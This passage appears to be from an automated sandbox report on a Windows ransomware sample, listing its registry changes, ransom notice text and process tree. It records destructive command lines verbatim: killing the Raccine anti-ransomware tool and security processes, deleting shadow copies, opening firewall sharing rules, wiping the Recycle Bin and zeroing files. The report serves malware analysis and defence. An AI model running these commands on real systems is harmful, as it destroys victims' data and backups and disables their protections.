of 1740 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1740 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1740 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3348 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3348 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3348 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3052 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3052 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3052 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3528 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3528 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3528 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 2920 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 2920 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 2920 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3660 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3660 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3660 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3616 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3616 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 3616 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe PID 2476 wrote to memory of 1136 2476 b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe taskkill.exe -
System policy modification 1 TTPs 4 IoCs
Processes:
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "YOUR COMPANY WAS HACKED AND COMPROMISED!!!" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\nWe has DOWNLOADED of your PRIVATE SENSITIVE Data!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO" b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe"C:\Users\Admin\AppData\Local\Temp\b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2476 -
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:3584
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:928
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:2852
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:1316
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:1460
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1264
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:2552
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:732
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:388
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:4032
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵PID:1208
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3348
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3660
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:724
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3980
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:720
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4012
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2936
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4072
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4000
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:688
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:928
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
- Drops file in Windows directory
PID:3008
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:3220
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:1156
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵PID:1060
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:2112
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:3948
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:608
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta2⤵PID:2312
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:3828
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:3552
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de.exe2⤵PID:184
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:3548
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
4bb6350ecb457585e8c712a6ebbcaa0a
SHA12827135b36c2a15b3111fc899d1f88c1a4b36fcd
SHA25642bbe9a64760ab713d7fe85f9718a783d913285c4a9afc9288345d4a36909835
SHA512de9e16c58fc061460a901882f1658261755cd6db39a71c6f3afe955dda45f27f5c4b40f76d84968130eb5af148f3f74c13c65dc854cfea5be4f29496df6d3db2